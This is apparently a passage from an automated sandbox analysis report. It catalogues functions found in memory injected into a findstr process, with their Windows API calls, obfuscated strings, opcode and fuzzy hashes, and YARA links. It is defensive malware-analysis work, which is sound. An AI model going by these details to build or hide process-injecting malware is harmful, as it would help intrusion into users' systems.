                                                • Instruction ID: c45a2281025e3bfc71d2ecefc5e8719d12934bbcc58b655e3b55ecf6c95c8b5b
                                                • Opcode Fuzzy Hash: 4f097e5e9a8296fd8cf24a6ac82b790e8d177638811fb9736a50721c4c582627
                                                • Instruction Fuzzy Hash: 883181B1680705BFC724DF64D884FEBBBB9AB48744F00961DFA595B245D7B0B640CBA0
                                                Function 02E51740 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 267networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 02E51A44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Startup
                                                • String ID: \
                                                • API String ID: 724789610-2967466578
                                                • Opcode ID: 273342268bfa830e3bd9272339ece92985735d833ff69005163a5bbd0ce7cda9
                                                • Instruction ID: d1f62c528ef2c34e39009ede692199b94fa57211da1cd9588e56640044302cb8
                                                • Opcode Fuzzy Hash: 273342268bfa830e3bd9272339ece92985735d833ff69005163a5bbd0ce7cda9
                                                • Instruction Fuzzy Hash: AA91B670E90315AFDB25DFA4C844BEEBBF5BF04748F149129F908AB240E7746644CBA1
                                                Function 02E5173C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 264networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 02E51A44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Startup
                                                • String ID: \
                                                • API String ID: 724789610-2967466578
                                                • Opcode ID: 082ec0c775722673c9ba18187e2d2513496b1a92863d99259c224b8c882c4d48
                                                • Instruction ID: 5d9f08769e16d941a12b3ba537bd68d63a505504a6d84111e82292af3be8b886
                                                • Opcode Fuzzy Hash: 082ec0c775722673c9ba18187e2d2513496b1a92863d99259c224b8c882c4d48
                                                • Instruction Fuzzy Hash: 4191B470D90315AFDB24DFA4C845BEEBBF5BF04748F149129F908AB240E7746684CBA1
                                                Function 02E5ECAD Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 02E5ECC7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: @J7<
                                                • API String ID: 2538663250-2016760708
                                                • Opcode ID: 072e07a5cafbfdd79b57ccefc65c6c0b7f00207ec08500d05d849c139cc27c62
                                                • Instruction ID: 5ac9887653ea8f902ea2add9b78425dc25f5860a15fdae808086dca42233f284
                                                • Opcode Fuzzy Hash: 072e07a5cafbfdd79b57ccefc65c6c0b7f00207ec08500d05d849c139cc27c62
                                                • Instruction Fuzzy Hash: 1E3141B5A10209AFDB00DFD8C8809EFB7B9FF89304B148559E905EB214D775EE05CBA0
                                                Function 02E5ECB0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 02E5ECC7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: @J7<
                                                • API String ID: 2538663250-2016760708
                                                • Opcode ID: 432c1248411d2c46a7a68ea5f9584823acfea610344e747d4852579c4b4f43ea
                                                • Instruction ID: 43f8bc82490b71d613b851663c6518d485419788424124c59de8e67c2091d3cf
                                                • Opcode Fuzzy Hash: 432c1248411d2c46a7a68ea5f9584823acfea610344e747d4852579c4b4f43ea
                                                • Instruction Fuzzy Hash: 1C3121B5A106099FDB00DFD8D8809EEB7B9BF89304B148559E905EB214D775EE058BA0
                                                Function 02E545B0 Relevance: 1.6, APIs: 1, Instructions: 104libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E545A2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: e987e27dd546413dec91a427c27747d2880c049e74be4f6c88ff9a713a06d772
                                                • Instruction ID: 666b9d817b6333233fc41ef22dd1b52a79febfe1e0d999b8eebe021eb2ff28ec
                                                • Opcode Fuzzy Hash: e987e27dd546413dec91a427c27747d2880c049e74be4f6c88ff9a713a06d772
                                                • Instruction Fuzzy Hash: 5921CDB79902097BDB01CDA8DC82FEEB7A5EB4124CF009158EC05DB282D732D506CBE1
                                                Function 02E519AD Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 02E51A44
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Startup
                                                • String ID:
                                                • API String ID: 724789610-0
                                                • Opcode ID: efe2ae9c840dc0840b97880b9e7c1ad82d77ad3d0c0106f58419868fa5984e9a
                                                • Instruction ID: eb0c536ac7ed5d99775d90f3bc69da13eed219ad7a3560bdd05cfb486c020493
                                                • Opcode Fuzzy Hash: efe2ae9c840dc0840b97880b9e7c1ad82d77ad3d0c0106f58419868fa5984e9a
                                                • Instruction Fuzzy Hash: 27113471D81319AFCB01DBE48C81BEEB7B8AF09340F045156E908F7241E7746A448BEA
                                                Function 02E54530 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E545A2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                • Instruction ID: deaa4a4ce7233c2e3645c258fea1e3d59acd81ce5afe557a3d1d1a5afcc3157e
                                                • Opcode Fuzzy Hash: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                • Instruction Fuzzy Hash: 9A014CB5D8020DBBDB10DAA4DC45FEDB3B9AB44208F0081A4A908A7281F631E748CB91
                                                Function 02E68490 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(02E51030,02E51058,02E50E30,00000000,02E57E13,00000010,02E51058,?,?,00000044,02E51058,00000010,02E57E13,00000000,02E50E30,02E51058), ref: 02E684F0
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 75925144f251256c48620b1f1186ad58dd416a803079d16763daa8f225b138dc
                                                • Instruction ID: cfd781f3d5414d7169ec104fdee810f9ad0a54fc5641f8f9a1d1f4abe39860b8
                                                • Opcode Fuzzy Hash: 75925144f251256c48620b1f1186ad58dd416a803079d16763daa8f225b138dc
                                                • Instruction Fuzzy Hash: 1201C0B2204208BBCB44DF99DC80EEB77ADAF8C754F519108BA09E3240DA30F851CBA4
                                                Function 02E497D0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E49812
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: f881a9c6838bd57fa3c4755ee97b3e458390389975197965264650576da4c448
                                                • Instruction ID: 9570ec6c6c66d53fea1c2859ca205fa306319f11b765d068f276a29dc51f988a
                                                • Opcode Fuzzy Hash: f881a9c6838bd57fa3c4755ee97b3e458390389975197965264650576da4c448
                                                • Instruction Fuzzy Hash: D7F065333C031436D73065A9AC02FEB725D8B80BB5F198425F60DEB1C1D991B40146E5
                                                Function 02E497C8 Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E49812
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 19906642e3035405cd5c830cdc5250707211b6d5a88c3a47cf0cd11cfbee1bcc
                                                • Instruction ID: 76ab0813ca081fbbdacdddf71125493e08c2404faf15661775def8e9205cb9c4
                                                • Opcode Fuzzy Hash: 19906642e3035405cd5c830cdc5250707211b6d5a88c3a47cf0cd11cfbee1bcc
                                                • Instruction Fuzzy Hash: 5DF0E5333C030036D23075999C02FEB226D8F80BA0F598518F60CEA1C1DA6674018AA4
                                                Function 02E49829 Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E49812
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 48bfa06585e4a829aa7e7fe506319ac195018004edc39e94c7679dad41e675b6
                                                • Instruction ID: 74884da60728e074b3d9c78e4f8d8c35844d03a1f7d78cb3968df7bc6d707f78
                                                • Opcode Fuzzy Hash: 48bfa06585e4a829aa7e7fe506319ac195018004edc39e94c7679dad41e675b6
                                                • Instruction Fuzzy Hash: 60E086733C070026E232616C9C02FAB619D9B80B55F298529F30AEF2C2DE95B4020694
                                                Function 02E683B0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(02E51799,?,02E64B0F,02E51799,02E64727,02E64B0F,?,02E51799,02E64727,00001000,?,?,02E69C50), ref: 02E683EF
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                                                • Instruction ID: 7be5acdf086bd265686cb4bd97b35e4346ad6310ef4558b744a9901e2298f2fb
                                                • Opcode Fuzzy Hash: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                                                • Instruction Fuzzy Hash: 34E065762402087FDA10EE59DC48FAB73ADEFC9750F408408F908A7241DB31B9108AB4
                                                Function 02E68400 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,550305C2,00000007,00000000,00000004,00000000,02E53E05,000000F4,?,?,?,?,?), ref: 02E6843F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                                                • Instruction ID: 9be242219e0fdd7e7b721b45af5a2b3e7cbe9824f05dfb12fd91636cd7628a59
                                                • Opcode Fuzzy Hash: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                                                • Instruction Fuzzy Hash: 03E06D712443047BC610EE59DC44FAB73ADEFC9754F004018F908A7241C771B910CAB4
                                                Function 02E57C60 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,02E51A80,02E66E47,02E64727,?), ref: 02E57C91
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 75f06d49755477454b4085bd0923f900f3e1d1f16c99366c230924b8cce6adef
                                                • Instruction ID: 9d162ff064af68663b3be3757aaea409ec20f9604aa68e0a5f7eedc9380c255a
                                                • Opcode Fuzzy Hash: 75f06d49755477454b4085bd0923f900f3e1d1f16c99366c230924b8cce6adef
                                                • Instruction Fuzzy Hash: 64D05E726C03043BFA40AAA4DC06F5A328E8B04A98F499464F90CDF6C2ED52F5104565
                                                Function 02E57E70 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE ref: 02E57E7A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                • Instruction ID: 525ec169da3d2bf43fdf6ab5f9248ce593c930a2092e5f432cf8b208cb3a1e63
                                                • Opcode Fuzzy Hash: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                • Instruction Fuzzy Hash: DAC012312A012804EA2005EC7C483A273488B8332CB186A95A82CAA4E0C63298A69000
                                                Function 036C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 57f2d76d4a5700629f0266d00578743e8d7767406c8168440aed7bb715cc66ff
                                                • Instruction ID: 38c9619ba16b58b4729537898405cdc17b26d6926504aed55d8fdf2cab2b87b2
                                                • Opcode Fuzzy Hash: 57f2d76d4a5700629f0266d00578743e8d7767406c8168440aed7bb715cc66ff
                                                • Instruction Fuzzy Hash: 92B09B71D015D5C5DE51E760470C7177914A7D1701F1DC465D2030751F4779C5D1E175

                                                Non-executed Functions

                                                Function 0349B7FA Relevance: 57.8, Strings: 46, Instructions: 250COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925100833.0000000003490000.00000040.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3490000_findstr.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                • API String ID: 0-3754132690
                                                • Opcode ID: fd3712b3bfd487199239d5500132267c023e4877587cfa18c35df2fde8904628
                                                • Instruction ID: 318a4b318a945025e91e641a8e2c7b5e9f914551fb5426a2d14560ac730845af
                                                • Opcode Fuzzy Hash: fd3712b3bfd487199239d5500132267c023e4877587cfa18c35df2fde8904628
                                                • Instruction Fuzzy Hash: 50A152F04083948AC7198F58A0552AFFFB5EBC6305F1581ADE6E6BB243C37E8905CB95
                                                Function 03492D3E Relevance: 20.1, Strings: 16, Instructions: 67COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925100833.0000000003490000.00000040.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3490000_findstr.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "">7$43 ;$9={r$;&}g$;=<}$>7}c$>;97$>;97$>>3}$ae|g$c`r$c|`r$e|br$e|ga$g|br$}kga
                                                • API String ID: 0-3696260499
                                                • Opcode ID: ef385a0a1ccb649719418f2f33c95e721cf96fd19a481a83203e0645119b2af0
                                                • Instruction ID: 6300fb8bed7d41c89dbfdf4918ce0fe9ff600606db9ad6642510cf543457d777
                                                • Opcode Fuzzy Hash: ef385a0a1ccb649719418f2f33c95e721cf96fd19a481a83203e0645119b2af0
                                                • Instruction Fuzzy Hash: 9A3143B580474CEEDB14CF95D281ADEBB71FB05344F90815AE8096B384C7758659CB8A
                                                Function 036C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 0dbf48ef8bc33eb4d87427b7d51fc2cab31a8b1fbebb7780e86f292300d0fb18
                                                • Instruction ID: ecbc558bc220452e9326adbb5ca97c4f61aeebf55502e5adcbd04ac04b1e5f7d
                                                • Opcode Fuzzy Hash: 0dbf48ef8bc33eb4d87427b7d51fc2cab31a8b1fbebb7780e86f292300d0fb18
                                                • Instruction Fuzzy Hash: 1751E7B6A10256BFCF10DF99C99097EF7B8FB08200B54856DE969D7741D234DE048BE0
                                                Function 036B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 036F4787
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036F46FC
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036F4725
                                                • Execute=1, xrefs: 036F4713
                                                • ExecuteOptions, xrefs: 036F46A0
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036F4742
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036F4655
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: c262174c3d35815e02aa4a5e76113a87eb9e03d58019dea38e98f1ccab30ee6e
                                                • Instruction ID: 0192131964a69e3074a2c013c3069c09561a33c0325778dcafbf7294c0f62a10
                                                • Opcode Fuzzy Hash: c262174c3d35815e02aa4a5e76113a87eb9e03d58019dea38e98f1ccab30ee6e
                                                • Instruction Fuzzy Hash: 11510735A00319AFDF21EBA5DD99FFE73B8EF49300F0400A9D505AB291EB719A918F54
                                                Function 036CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction ID: 35dfe9c5118c3164228ed2a9b4871c710075c0a180abe5ffe7730b5ce398d2c1
                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction Fuzzy Hash: 6C81DE30E222C99ADF24CE69CA967FEBBB5EF45310F1C415ED861A73D1C73488518B64
                                                Function 036AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036F02BD
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036F02E7
                                                • RTL: Re-Waiting, xrefs: 036F031E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: dcc7df1d9107830c981f1ac5ecd141f10809570331f6a2848d7b1f3c2544a8ef
                                                • Instruction ID: b7be020544823c9c4be6516f7e130ad8bd84bbfb1d7b18a27791ad59ed6ce646
                                                • Opcode Fuzzy Hash: dcc7df1d9107830c981f1ac5ecd141f10809570331f6a2848d7b1f3c2544a8ef
                                                • Instruction Fuzzy Hash: 2EE1BB31608B419FD725CF28C984B2ABBE0BB89324F184A6DF5A58B3E1D774D845CB52
                                                Function 036BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 036F7BAC
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036F7B7F
                                                • RTL: Resource at %p, xrefs: 036F7B8E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: 8904bc93e45b709f007daecd62194c6acbc2a4ae1bcb192fbf723ece88ff9c8a
                                                • Instruction ID: 373e3e4b5677f9f00f0c80b08e1bdf4a8464f894eb0d386669b50b0584828a0d
                                                • Opcode Fuzzy Hash: 8904bc93e45b709f007daecd62194c6acbc2a4ae1bcb192fbf723ece88ff9c8a
                                                • Instruction Fuzzy Hash: F941E2357047029FD724CE25C940BAAB7F9EF89710F040A2DE95A9B380DB71E845CF95
                                                Function 036BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036F728C
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 036F72C1
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036F7294
                                                • RTL: Resource at %p, xrefs: 036F72A3
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 0996899eaeca102b32df2211a22bf3b45d6b3e1befb180f1c7519acc070dc0aa
